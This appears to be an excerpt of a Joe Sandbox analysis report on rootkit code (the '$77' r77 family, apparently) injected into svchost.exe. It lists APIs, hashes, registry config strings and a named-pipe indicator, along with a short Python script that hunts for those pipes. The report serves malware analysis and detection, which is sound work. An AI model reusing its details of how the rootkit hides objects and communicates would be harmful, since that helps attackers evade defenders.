• CreateThread.KERNELBASE ref: 00000158709D385B
  • Part of subcall function 00000158709D1E38: GetCurrentThread.KERNEL32 ref: 00000158709D1E43
Memory Dump Source
• Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
• Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
Similarity
• API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
• String ID:
• API String ID: 1683269324-0

Control-flow Graph

(graph not reproduced; basic blocks 158709d3d4c-158709d3d57, 158709d3d59-158709d3d6c containing the StrCmpNIW call, 158709d3d6e, and 158709d3d71-158709d3d78)
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
• Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
Similarity
• API ID:
• String ID: $77
• API String ID: 0-3904844309
                                                                                                                                  • Opcode ID: 5580df2f93f9e927cc8ef56930575b5a143413bdc5efa440e0a001dab306ac07
                                                                                                                                  • Instruction ID: 8c38d3aab29e4468933ba41721884bd6a9c2eaa161661ef972de9752e6c88599
                                                                                                                                  • Opcode Fuzzy Hash: 5580df2f93f9e927cc8ef56930575b5a143413bdc5efa440e0a001dab306ac07
                                                                                                                                  • Instruction Fuzzy Hash: E6D05EBD351E09DBEB149FA18CD57E03351DB8C746F98A124C90119150DF588DAFDE10
APIs
Memory Dump Source
• Source File: 0000000B.00000003.1468191534.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_3_158709a0000_svchost.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: dbf631b01d922bf85625c67df28bfff86a642957146a4ef27c224eb87c1a85be
• Instruction ID: 220f75e7d15c3eed2a92258d634bcd4488dd5313bed2004f993af08b57ce3e13
• Opcode Fuzzy Hash: dbf631b01d922bf85625c67df28bfff86a642957146a4ef27c224eb87c1a85be
• Instruction Fuzzy Hash: 6D9149B6705A50CBDB648F29D800BED73A1F788B95F6481249F497BB88DE34D853DB10

Control-flow Graph

APIs
  • Part of subcall function 00000158709D1724: GetProcessHeap.KERNEL32 ref: 00000158709D172F
  • Part of subcall function 00000158709D1724: HeapAlloc.KERNEL32 ref: 00000158709D173E
  • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D17AE
  • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D17DB
  • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D17F5
  • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1815
  • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D1830
  • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1850
  • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D186B
  • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D188B
  • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D18A6
  • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D18C6
• SleepEx.KERNELBASE ref: 00000158709D1BDB
  • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D18E1
  • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1901
  • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D191C
  • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D193C
  • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D1957
  • Part of subcall function 00000158709D1724: RegOpenKeyExW.ADVAPI32 ref: 00000158709D1977
  • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D1992
  • Part of subcall function 00000158709D1724: RegCloseKey.ADVAPI32 ref: 00000158709D199C
Memory Dump Source
• Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
• Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
Similarity
• API ID: CloseOpen$Heap$AllocProcessSleep
• String ID:
• API String ID: 948135145-0
• Opcode ID: 90453a0d966f37a875fa9fa31a0a9dc9a62d0711adb439b1f5817520d04ee1bf
• Instruction ID: fd4cc397893f53735cf364b395b4fabd7387da9bea1c14ab3b2dc466b9a8be75
• Opcode Fuzzy Hash: 90453a0d966f37a875fa9fa31a0a9dc9a62d0711adb439b1f5817520d04ee1bf
• Instruction Fuzzy Hash: 3531D07A394E49E1EB509B36DD403E93394A7CDBC2F2454219E49AB797DF14C4528B10
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
• Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 9e30670d31594c82338516e34ef0e2d13c32e846fbd060b69fc476bfa9e774bc
• Instruction ID: 54be32834677706be69278d553df8f46ab9c44e5ca7b53d497824bc7f3806f3d
• Opcode Fuzzy Hash: 9e30670d31594c82338516e34ef0e2d13c32e846fbd060b69fc476bfa9e774bc
• Instruction Fuzzy Hash: 46313A7A214F80DAEB608F60E8803EA7364F788745F54442ADB4E5BB99DF38C559CB10
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
• Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: e8873b674f2e359e5f96541e43b59108724062fc4a870e8b19e24c4a97edadbc
• Instruction ID: 72b933b0e77b6e0ae717d08143115f409b073c01848e22cb3db2aa3d7bb931c7
• Opcode Fuzzy Hash: e8873b674f2e359e5f96541e43b59108724062fc4a870e8b19e24c4a97edadbc
• Instruction Fuzzy Hash: D9416A7A214F80C6EB60CB25E8403EE73A0F7C8795FA40515EB9D5ABA9DF38C556CB40
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
• Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID:
• API String ID: 1164774033-0
• Opcode ID: de3a4f1c4722aca2eb904f336336930601643f7c9dfe6b9c18223e648004d9fa
• Instruction ID: 8c7ebd7da17ff4c60b475406bc813041573e1bd7b5b0d13cbdad66ba5da6f188
• Opcode Fuzzy Hash: de3a4f1c4722aca2eb904f336336930601643f7c9dfe6b9c18223e648004d9fa
• Instruction Fuzzy Hash: 85A1E33A74DA84C9FB219B75DC403ED7BA0A7C9B96F644115DA993F696CE38C443CB00

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
• Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
Similarity
• API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\$77config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 2135414181-649645306
• Opcode ID: 450dbbf1704afe51d16eaedd2f846ad832dc3a6968aef11f1843edb122fe1598
• Instruction ID: d4d80f730e80a4f8d9254abaa6afe0bf8c76a90f8ec6f1969ccd2b8eca49734b
• Opcode Fuzzy Hash: 450dbbf1704afe51d16eaedd2f846ad832dc3a6968aef11f1843edb122fe1598
• Instruction Fuzzy Hash: 1B71067B610E54D6EB109F75EC907D933A4FBC8B8AF501111EA8D6BB29DE38C856CB40

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
• Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
• API String ID: 2005889112-2564639436
• Opcode ID: a54fc127e61d0168aa516e5340f5f1e347c27459d257a44bc878666ad7d983e8
• Instruction ID: 2302c693d113bf2a915ad50ba5083747d45724e67c005d9d217f03877c1143d0
• Opcode Fuzzy Hash: a54fc127e61d0168aa516e5340f5f1e347c27459d257a44bc878666ad7d983e8
• Instruction Fuzzy Hash: 26512A77218B84D6EB14CF62E84839A77A1F7C8B9AF644124DA495B768DF3CC45ACB00
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                                                                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                                                                                                  • API String ID: 740688525-1880043860
                                                                                                                                  • Opcode ID: 89f5c5e66e1b755f5237e9f7541e1364ddeb157113d91c30ac669978387284b4
                                                                                                                                  • Instruction ID: 7042ab722a4b17450b2e72e22a8bb17e200c9664d7f2e0b5581a066eebedc37c
                                                                                                                                  • Opcode Fuzzy Hash: 89f5c5e66e1b755f5237e9f7541e1364ddeb157113d91c30ac669978387284b4
                                                                                                                                  • Instruction Fuzzy Hash: CA51B63A345E08D1EA59AB56AC003D57350ABCCBB6F684724DE3D6B3D1DF38C8578A50
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                                                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                                                                                                  • API String ID: 1943346504-3507739905
                                                                                                                                  • Opcode ID: 9639e886c49eaef89c86f9b1444dfaf1491e17b7a6c502a98820b8b399e89069
                                                                                                                                  • Instruction ID: 618a3e9c4df8a7a762312c2b99e3080b16bd3ae9954015b634ef086f8961520d
                                                                                                                                  • Opcode Fuzzy Hash: 9639e886c49eaef89c86f9b1444dfaf1491e17b7a6c502a98820b8b399e89069
                                                                                                                                  • Instruction Fuzzy Hash: E4318F7A604F45D6E710DF12AD44799B3A0B7D8FC6F648025DE4A6B725EF38D817CA00
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000003.1468191534.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_3_158709a0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                  • Opcode ID: 3884363ef5fed76742796f8538938bfe25b25e9dae83a2dc69048c1d4c6ad6c5
                                                                                                                                  • Instruction ID: 377a964e5721071aa0970609fa450d7d61c3a3c289014e197656bb0d836589f0
                                                                                                                                  • Opcode Fuzzy Hash: 3884363ef5fed76742796f8538938bfe25b25e9dae83a2dc69048c1d4c6ad6c5
                                                                                                                                  • Instruction Fuzzy Hash: 6ED16DBA608B40CAEB60DF259C413DD77A0F78D799F200115EE896BB96DF38C492DB00
                                                                                                                                  • Control-flow graph: interactive rendering not reproduced (entry block 158709d9fec, exit block 158709da4b5-158709da4bb; node and edge list omitted)
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                  • Opcode ID: 9e9a052f380ae36a22c7ac5ba5d0289ca659db317daadf64a872ab054cbc62a4
                                                                                                                                  • Instruction ID: bfb7d10d16bf97ecc220be747ead0c58b46accd339ced6f35570ff6ba8c4cb6f
                                                                                                                                  • Opcode Fuzzy Hash: 9e9a052f380ae36a22c7ac5ba5d0289ca659db317daadf64a872ab054cbc62a4
                                                                                                                                  • Instruction Fuzzy Hash: 2BD1923A648B48CAEB20DF65D8443DD77A0F799789F204115EE896BB97CF34C492CB01
                                                                                                                                  • Control-flow graph: interactive rendering not reproduced (entry block 158709d104c; call sites RegQueryInfoKeyW, RegEnumValueW, GetProcessHeap, HeapAlloc, HeapFree; node and edge list omitted)
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                  • String ID: d
                                                                                                                                  • API String ID: 3743429067-2564639436
                                                                                                                                  • Opcode ID: 4d659206498d04cf2c755275944e0373eee03599aa096e77f7991030ce63d003
                                                                                                                                  • Instruction ID: 0d449c8a788a7c76f8ea385fc5ad28909d68ba12b5fddd9c8f34025eaa0c6d1f
                                                                                                                                  • Opcode Fuzzy Hash: 4d659206498d04cf2c755275944e0373eee03599aa096e77f7991030ce63d003
                                                                                                                                  • Instruction Fuzzy Hash: 10419277218F84D6E760CF61E84439E77A1F389B99F548129DB891B758DF38C48ACB40
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                                                                                  • String ID: \\.\pipe\$77childproc
                                                                                                                                  • API String ID: 166002920-421986751
                                                                                                                                  • Opcode ID: 6b478bf275f7f707eec9553fd3cd4fa2dc87a7a9d36fcded0365874d1676b014
                                                                                                                                  • Instruction ID: a92dc02c939b716f746436801544e1fb0527fb3d7e624fb3fae8380cf38e9771
                                                                                                                                  • Opcode Fuzzy Hash: 6b478bf275f7f707eec9553fd3cd4fa2dc87a7a9d36fcded0365874d1676b014
                                                                                                                                  • Instruction Fuzzy Hash: C9111C3A618B40D2E710CB21F85439A7760F7C9BE6F644215EA991ABA8CF7CC55ACF40
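The function above carries the string `\\.\pipe\$77childproc` next to CreateFile, ReadFile, WriteFile and CreateThread, which is a named-pipe channel inside the code injected into svchost.exe. The following Python is an added hunting example written for this report, not code from Joe Sandbox or from the sample; it checks a named-pipe listing for that exact pipe and, as a broader rule, for any pipe whose name starts with `$77`. The prefix rule is an assumption drawn from the r77 rootkit family's naming convention and is not stated by the report; the pipe listing used offline is constructed.

```python
import os
import re
import sys

# Pipe name observed in the injected svchost.exe region (from the report above).
R77_CHILD_PIPE = r"\\.\pipe\$77childproc"

# Assumption: r77-family rootkits hide objects whose names begin with "$77".
# The report shows only the one pipe name; the prefix rule is not from the report.
HIDDEN_PREFIX = "$77"

# Constructed sample of what os.listdir(r"\\.\pipe\\") returns on a Windows host.
SAMPLE_PIPE_LISTING = ["lsass", "srvsvc", "$77childproc", "wkssvc", "$77svc", "InitShutdown"]

# Matches a leading \\.\pipe\ so full device paths and bare listing entries compare alike.
_PIPE_PREFIX_RE = re.compile(r"^\\\\\.\\pipe\\", re.IGNORECASE)


def bare_pipe_name(name):
    """Return the pipe name without its \\.\pipe\ prefix."""
    return _PIPE_PREFIX_RE.sub("", name)


def classify_pipe(name):
    """'exact' for the reported pipe, 'prefix' for any other $77-prefixed pipe, else None."""
    bare = bare_pipe_name(name).lower()
    if bare == bare_pipe_name(R77_CHILD_PIPE).lower():
        return "exact"
    if bare.startswith(HIDDEN_PREFIX.lower()):
        return "prefix"  # assumption-based rule, see HIDDEN_PREFIX
    return None


def find_r77_pipes(pipes):
    """Return (name, reason) pairs for every suspicious pipe, in listing order."""
    hits = []
    for name in pipes:
        reason = classify_pipe(name)
        if reason is not None:
            hits.append((name, reason))
    return hits


def list_named_pipes():
    """Live listing on Windows; the constructed sample elsewhere so the example runs offline."""
    if sys.platform == "win32":
        try:
            return os.listdir(r"\\.\pipe\\")
        except OSError:
            return []
    return list(SAMPLE_PIPE_LISTING)


if __name__ == "__main__":
    for name, reason in find_r77_pipes(list_named_pipes()):
        print(f"suspicious named pipe: {name} ({reason})")
```

One caveat: the report flags hooked file and directory query functions, so on a host where those hooks are active the listing itself may already omit the `$77` entries. Run the check from a context the rootkit does not hook (a clean boot, a forensic image, or the memory dumps attached to this report) rather than trusting a live listing on the infected machine.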
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000003.1468191534.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_3_158709a0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190073905-0
                                                                                                                                  • Opcode ID: 4cfe563361612e673ca8ea5c27d7c1653f9d4d75b0ebbab1fe199f08d0a2e3d7
                                                                                                                                  • Instruction ID: 15ba81216c1147431e7aa418fc66026d5b7287a279c23db10eb9e35c9a9a1630
                                                                                                                                  • Opcode Fuzzy Hash: 4cfe563361612e673ca8ea5c27d7c1653f9d4d75b0ebbab1fe199f08d0a2e3d7
                                                                                                                                  • Instruction Fuzzy Hash: 4E81B1B960CE41C6FA54DB25AC423D9B6D0ABCE786F7444259A04AF792DF38C847EF00
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$Current$Context
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1666949209-0
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID: $77
• API String ID: 756756679-3904844309
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
Similarity
• API ID: ErrorLast$Value$FreeHeap
• String ID:
• API String ID: 365477584-0
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
• String ID:
• API String ID: 449555515-0
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
Similarity
• API ID: FinalHandleNamePathlstrlen
• String ID: \\?\
• API String ID: 2719912262-4282027825
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
Strings
Memory Dump Source
